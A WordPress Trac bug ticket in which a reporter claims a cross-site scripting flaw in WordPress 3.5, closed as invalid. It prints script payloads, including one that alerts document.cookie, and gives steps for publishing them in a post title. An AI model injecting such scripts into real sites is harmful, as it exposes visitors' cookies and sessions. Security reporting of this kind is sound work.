id	summary	reporter	owner	description	type	status	priority	milestone	component	version	severity	resolution	keywords	cc
22861	Wordpress 3.5 - Cross Site Scripting Vulnerability	shubhammittal01		"Hi, My name is Shubham Mittal. I have a bug at new Wordpress (latest version, 3.5). This bug is Cross Site Scripting.

[XSS] New Wp-Post

Exploit Title: CMS Wordpress - XSS Vulnerability [[BR]]
Author : Shubham Mittal[[BR]]
E-mail : upgoingstaar@gmail.com [[BR]]
Webpage: http://3ncrypt0r.blogspot.com[[BR]]
Version CMS : Version 3.5 (Last Version) [[BR]]
Category : WebApps / Content Management System (CMS) [[BR]]
Security Risk: Medium Level [[BR]]
Link Downlaod: ​http://www.wordpress.org/ [[BR]]
Tested On : Mozilla Firefox + WAMP + Windows 7 64 Bit

[Information Content]
WordPress - Web Publishing Software. ​http://www.wordpress.org/

[Vulnerability Details]

XSS CODE: 
<script>alert(""XSSedByShubham"")>[[BR]]
</script<script>alert(document.cookie);</script>[[BR]]
<script>window.open(""​http://www.google.com/"")</script>

Exploit Report:
1. Create / Edit Wp-Post
Input ""Title Post"" with script XSS Code.
<script>alert(""XSSedByShubham"")</script>

2. http://example.com/wp-admin/post-new.php <---Publish It
 
3. View XSS, Alert Box will pop up. http://example.com/?p=xxx <--XSSed
http://4.bp.blogspot.com/-zNKPa-mQPEc/UMejBt8a3HI/AAAAAAAABQQ/HsG9RQnRwlg/s1600/post+xss.jpg

Thanks

Shubham Mittal
@upgoingstar"	defect (bug)	closed	normal		Security		normal	invalid		upgoingstaar@…